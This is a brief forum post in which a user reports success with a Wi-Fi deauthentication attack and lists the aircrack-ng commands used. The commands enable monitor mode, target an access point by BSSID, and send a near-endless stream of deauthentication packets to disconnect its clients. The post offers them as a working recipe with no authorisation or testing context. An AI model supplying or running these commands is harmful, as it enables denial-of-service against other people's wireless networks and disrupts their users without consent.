hi i just tried and was succesful using the following method
airmon-ng start wlan0
airodump-ng -c (chanel) --bssid (bssid) mon0
aireplay-ng --deauth 9999999999999999 -o 1 -a (BSSID) -e (ESSID) mon0
mon0 = (your virtual wireless interface used for moniter mode)
9999999999999 = how many times to send the deauthentication packet
worked perfect.
hope this helps



